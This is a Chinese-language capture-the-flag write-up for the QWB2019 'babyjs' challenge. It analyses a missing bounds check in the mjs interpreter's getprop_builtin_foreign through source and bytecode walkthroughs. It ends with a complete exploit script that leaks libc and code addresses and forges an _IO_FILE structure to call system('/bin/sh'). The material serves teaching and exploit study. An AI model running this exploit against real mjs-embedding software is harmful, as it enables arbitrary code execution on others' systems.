QWB2019-babyjs

前言

之前看过的一道题,因为想知道js解释器的工作原理,就读了读源码,后来看了v8,这道题就太监了 …

参考了: 强网杯babyjs

poc分析

issue:AddressSanitizer: invalid READ at mjs.c:9644

参考文章中给出了github上的poc:

1
2
3
let s ;
let o = (s);
let z = JSON.parse[333333333%3333333333] === 'xx'

运行poc可以发现在getprop_builtin_foreign中存在越界访问:

其中RSI为输入的index,就是333333333%3333333333 , RAX为基地址。

源码分析

mjs对象的构成:

1
2
3
4
5
6
7
8
9
struct mjs_property {
struct mjs_property *next; /* Linkage in struct mjs_object::properties */
mjs_val_t name; /* Property name (a string) */
mjs_val_t value; /* Property value */
};

struct mjs_object {
struct mjs_property *properties;
};

属性通过链表串起来,属性中保存的有name和value,name及为属性的名称,value即为该属性所对应的值

mjs如何区分各类对象:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/*
* A tag is made of the sign bit and the 4 lower order bits of byte 6.
* So in total we have 32 possible tags.
*
* Tag (1,0) however cannot hold a zero payload otherwise it's interpreted as an
* INFINITY; for simplicity we're just not going to use that combination.
*
*/
#define MAKE_TAG(s, t) \
((uint64_t)(s) << 63 | (uint64_t) 0x7ff0 << 48 | (uint64_t)(t) << 48)

#define MJS_TAG_OBJECT MAKE_TAG(1, 1)
#define MJS_TAG_FOREIGN MAKE_TAG(1, 2)
#define MJS_TAG_UNDEFINED MAKE_TAG(1, 3)
#define MJS_TAG_BOOLEAN MAKE_TAG(1, 4)
#define MJS_TAG_NAN MAKE_TAG(1, 5)
#define MJS_TAG_STRING_I MAKE_TAG(1, 6) /* Inlined string len < 5 */
#define MJS_TAG_STRING_5 MAKE_TAG(1, 7) /* Inlined string len 5 */
#define MJS_TAG_STRING_O MAKE_TAG(1, 8) /* Owned string */
#define MJS_TAG_STRING_F MAKE_TAG(1, 9) /* Foreign string */
#define MJS_TAG_STRING_C MAKE_TAG(1, 10) /* String chunk */
#define MJS_TAG_STRING_D MAKE_TAG(1, 11) /* Dictionary string */
#define MJS_TAG_ARRAY MAKE_TAG(1, 12)
#define MJS_TAG_FUNCTION MAKE_TAG(1, 13)
#define MJS_TAG_FUNCTION_FFI MAKE_TAG(1, 14)
#define MJS_TAG_NULL MAKE_TAG(1, 15)

/*'0xffff000000000000' */
#define MJS_TAG_MASK MAKE_TAG(1, 15)

这里的tag是用来区分创建的对象的,通过在地址的高16位设置flag来区分是什么类型对象,通过与或操作来将flag置位或复位。

分析关键代码

通过引用找到调用getprop_builtin_foreign的地方:

在解析字节码OP_GET这里调用了getprop_builtin,通过读源码及调试得知OP_GET是获得object某个属性值的操作.
obj为被load的obj,key为属性名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
case OP_GET: {
mjs_val_t obj = mjs_pop(mjs);
mjs_val_t key = mjs_pop(mjs);
mjs_val_t val = MJS_UNDEFINED;

if (!getprop_builtin(mjs, obj, key, &val)) {
if (mjs_is_object(obj)) {
val = mjs_get_v_proto(mjs, obj, key);
} else {
mjs_prepend_errorf(mjs, MJS_TYPE_ERROR, "type error");
}
}

mjs_push(mjs, val);

getprop_builtin中调用了getprop_builtin_foreign

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
static int getprop_builtin(struct mjs *mjs, mjs_val_t val, mjs_val_t name,
mjs_val_t *res) {
size_t n;
char *s = NULL;
int need_free = 0;
int handled = 0;

mjs_err_t err = mjs_to_string(mjs, &name, &s, &n, &need_free);

if (err == MJS_OK) {
if (mjs_is_string(val)) {
handled = getprop_builtin_string(mjs, val, s, n, res);
} else if (s != NULL && n == 5 && strncmp(s, "apply", n) == 0) {
*res = mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_apply_);
handled = 1;
} else if (mjs_is_array(val)) {
handled = getprop_builtin_array(mjs, val, s, n, res);
} else if (mjs_is_foreign(val)) {
handled = getprop_builtin_foreign(mjs, val, s, n, res);
}
}

getprop_builtin这里先对传入的obj做类型判断,如果是string,array,foreign类型对象中的builtin属性,则直接取其value,如果都不是则return 0,进入外层函数后调用mjs_get_v_proto,进行普通的load属性操作

1
2
3
4
5
if (mjs_is_object(obj)) {
val = mjs_get_v_proto(mjs, obj, key);
} else {
mjs_prepend_errorf(mjs, MJS_TYPE_ERROR, "type error");
}

mjs_get_v_proto的定义如下:

1
2
3
4
5
6
7
mjs_val_t mjs_get_v_proto(struct mjs *mjs, mjs_val_t obj, mjs_val_t key) {
struct mjs_property *p;
mjs_val_t pn = mjs_mk_string(mjs, MJS_PROTO_PROP_NAME, ~0, 1);
if ((p = mjs_get_own_property_v(mjs, obj, key)) != NULL) return p->value;
if ((p = mjs_get_own_property_v(mjs, obj, pn)) == NULL) return MJS_UNDEFINED;
return mjs_get_v_proto(mjs, p->value, key);
}

遍历该obj的属性链表,如果找到了则返回其value。

getprop_builtin_foreign函数定义如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
static int getprop_builtin_foreign(struct mjs *mjs, mjs_val_t val,
const char *name, size_t name_len,
mjs_val_t *res) {
int isnum = 0;
int idx = cstr_to_ulong(name, name_len, &isnum);

if (!isnum) {
mjs_prepend_errorf(mjs, MJS_TYPE_ERROR, "index must be a number");
} else {
uint8_t *ptr = (uint8_t *) mjs_get_ptr(mjs, val);
*res = mjs_mk_number(mjs, *(ptr + idx));
}
return 1;
}

将name字符串转化为整形数字,然后检查name字符串是否为数字,如果为数字则取(obj的地址+idx)位置的值为value,这里没有检查idx的范围,所以存在越界访问.

builtin的实现及漏洞

在mjs最开始初始化时,生成了一个全局对象,mjs_set将这些builtin包装成属性加入这个全局对象。当使用了这些builtin的时候就会在全局对象中查找.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
mjs_set(mjs, obj, "load", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_load));
mjs_set(mjs, obj, "print", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_print));
...
/*
* Populate JSON.parse() and JSON.stringify()
*/

v = mjs_mk_object(mjs);
mjs_set(mjs, v, "stringify", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_json_stringify));
mjs_set(mjs, v, "parse", ~0,
mjs_mk_foreign_func(mjs, (mjs_func_ptr_t) mjs_op_json_parse));
mjs_set(mjs, obj, "JSON", ~0, v);

mjs_mk_foreign_func函数的定义如下:

1
2
3
4
5
6
7
8
9
mjs_val_t mjs_mk_foreign_func(struct mjs *mjs, mjs_func_ptr_t fn) {
union {
mjs_func_ptr_t fn;
void *p;
} u;
u.fn = fn;
(void) mjs;
return mjs_pointer_to_value(mjs, u.p) | MJS_TAG_FOREIGN;
}

mjs_mk_foreign_func将这些函数的类型标记为 MJS_TAG_FOREIGN,这里就会出现问题.
这样就可以对这些builtin函数当做一个js对象进行load或者store操作,例如JSON.parse[0x123456].当解释OP_GET时就会调用getprop_builtin_foreign来进行越界读取. 不止是JSON.parse,只要是这些builtin函数都存在这些问题。

1
print[0x12356]

这样也会造成越界读取

来看看正常array的创建及读取操作

array分析

1
2
let a = [1,2,3];
a[0];

这段js代码生成的字节码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
mjs_util.c:228                  0   BCODE_HDR   [poc.js] end:59 map_offset: 54
mjs_util.c:134 20 PUSH_STR [a]
mjs_util.c:233 23 PUSH_SCOPE
mjs_util.c:233 24 CREATE
mjs_util.c:134 25 PUSH_STR [a]
mjs_util.c:233 28 FIND_SCOPE
mjs_util.c:233 29 PUSH_ARRAY
mjs_util.c:233 30 DUP
mjs_util.c:117 31 PUSH_INT 1
mjs_util.c:233 33 APPEND
mjs_util.c:233 34 DUP
mjs_util.c:117 35 PUSH_INT 2
mjs_util.c:233 37 APPEND
mjs_util.c:233 38 DUP
mjs_util.c:117 39 PUSH_INT 3
mjs_util.c:233 41 APPEND
mjs_util.c:213 42 EXPR =
mjs_util.c:233 44 DROP
mjs_util.c:134 45 PUSH_STR [a]
mjs_util.c:233 48 FIND_SCOPE
mjs_util.c:233 49 GET
mjs_util.c:117 50 PUSH_INT 0
mjs_util.c:233 52 SWAP
mjs_util.c:233 53 GET
mjs_util.c:233 54 EXIT

使用PUSH_ARRAY来生成一个array:

1
2
3
case OP_PUSH_ARRAY:
mjs_push(mjs, mjs_mk_array(mjs));
break;

mjs_mk_array函数就是先创建一个obj,然后将他标记为arrayMJS_TAG_ARRAY:

1
2
3
4
5
6
7
mjs_val_t mjs_mk_array(struct mjs *mjs) {
mjs_val_t ret = mjs_mk_object(mjs);
/* change the tag to MJS_TAG_ARRAY */
ret &= ~MJS_TAG_MASK;
ret |= MJS_TAG_ARRAY;
return ret;
}

向array添加元素使用了字节码APPEND:

1
2
3
4
5
6
7
8
9
case OP_APPEND: {
mjs_val_t val = mjs_pop(mjs);
mjs_val_t arr = mjs_pop(mjs);
mjs_err_t err = mjs_array_push(mjs, arr, val);
if (err != MJS_OK) {
mjs_set_errorf(mjs, MJS_TYPE_ERROR, "append to non-array");
}
break;
}

这里调用了mjs_array_push:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
mjs_err_t mjs_array_push(struct mjs *mjs, mjs_val_t arr, mjs_val_t v) {
return mjs_array_set(mjs, arr, mjs_array_length(mjs, arr), v);
}

mjs_err_t mjs_array_set(struct mjs *mjs, mjs_val_t arr, unsigned long index,
mjs_val_t v) {
mjs_err_t ret = MJS_OK;

if (mjs_is_object(arr)) {
char buf[20];
int n = v_sprintf_s(buf, sizeof(buf), "%lu", index);
ret = mjs_set(mjs, arr, buf, n, v);
} else {
ret = MJS_TYPE_ERROR;
}

return ret;
}

他只是生成了一个name为idx(idx是字符串类型)的属性,然后value赋值到这个属性里,这里的buf存放的即是字符串类型的idx,然后将其传入mjs_set创建属性添加到这个array中去.

以idx访问数组使用了OP_GET,会调用到mjs_get_v_proto(mjs, obj, key);以字符串形式遍历属性,不会有越界访问的问题。

1
2
3
4
5
6
7
8
case OP_GET: {
mjs_val_t obj = mjs_pop(mjs);
mjs_val_t key = mjs_pop(mjs);
mjs_val_t val = MJS_UNDEFINED;

if (!getprop_builtin(mjs, obj, key, &val)) {
if (mjs_is_object(obj)) {
val = mjs_get_v_proto(mjs, obj, key);

分析poc字节码

1
JSON.parse[0x123456];

对应的字节码如下:

1
2
3
4
5
6
7
8
9
10
mjs_util.c:228                  0   BCODE_HDR   [poc.js] end:44 map_offset: 43
mjs_util.c:134 20 PUSH_STR [JSON]
mjs_util.c:233 26 FIND_SCOPE
mjs_util.c:233 27 GET
mjs_util.c:134 28 PUSH_STR [parse]
mjs_util.c:233 35 SWAP
mjs_util.c:233 36 GET
mjs_util.c:117 37 PUSH_INT 1193046
mjs_util.c:233 41 SWAP
mjs_util.c:233 42 GET

这几步得到parse builtin(mjs_op_json_parse)地址:

1
2
3
mjs_util.c:134                  28  PUSH_STR    [parse]
mjs_util.c:233 35 SWAP
mjs_util.c:233 36 GET

然后以0x123456为index来越界访问.

利用思路

通过偏移读取got表项内容,得到libc的基地址,通过读取init_array获取text基地址

最终通过伪造_IO_FILE结构体来getshell,详细的操作在参考文章中有.

完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
function read(offset){
let a=[];
for( let i = 0 ; i < 8 ; i++)
{
a[i] = JSON.parse[offset+i];
}
let res=0;
for(let i = 0 ;i < 8 ; i++)
{
res+=a[i]<<(8*i);
}
return res
}
function write(offset,target){
for(let i=0 ; i<8 ; i++){
JSON.parse[offset+i]=(target>>8*i)&0xff
}
}

let start_addr=0x55555556e800-0x555555554000;
let got_addr=0x00000000022CDF0;
let free_got=0x00000000022CE08;

let free_addr=read(free_got-start_addr);
let libc_base=free_addr-0x844f0;
let code_base=read(0x00000000022CAA8-start_addr)-0x000000000001D40;
let system_addr=libc_base+0x45390;
let bin_sh_addr=libc_base+0x18cd57;

let cs_log_file=0x00000000022D228;

let bss_addr=0x00000000022D218+0x100;

let _IO_str_jumps=0x3c37a0+libc_base;

let fake_file=[
0xfbad1800,0,0,0,1,2,0,bin_sh_addr,
];
for(let i = 0 ;i < fake_file.length ; i ++){
write(bss_addr-start_addr+i*8,fake_file[i]);
}
write(bss_addr-start_addr+0x88,0x7ffff78c6780-0x7ffff7500000+libc_base)
fake_file=[_IO_str_jumps-8,0,system_addr];
for(let i=0;i<fake_file.length;i++){
write(bss_addr-start_addr+0xd8+i*8,fake_file[i]);
}
write(cs_log_file-start_addr,bss_addr+code_base);
write(0x00000000022D220-start_addr,999);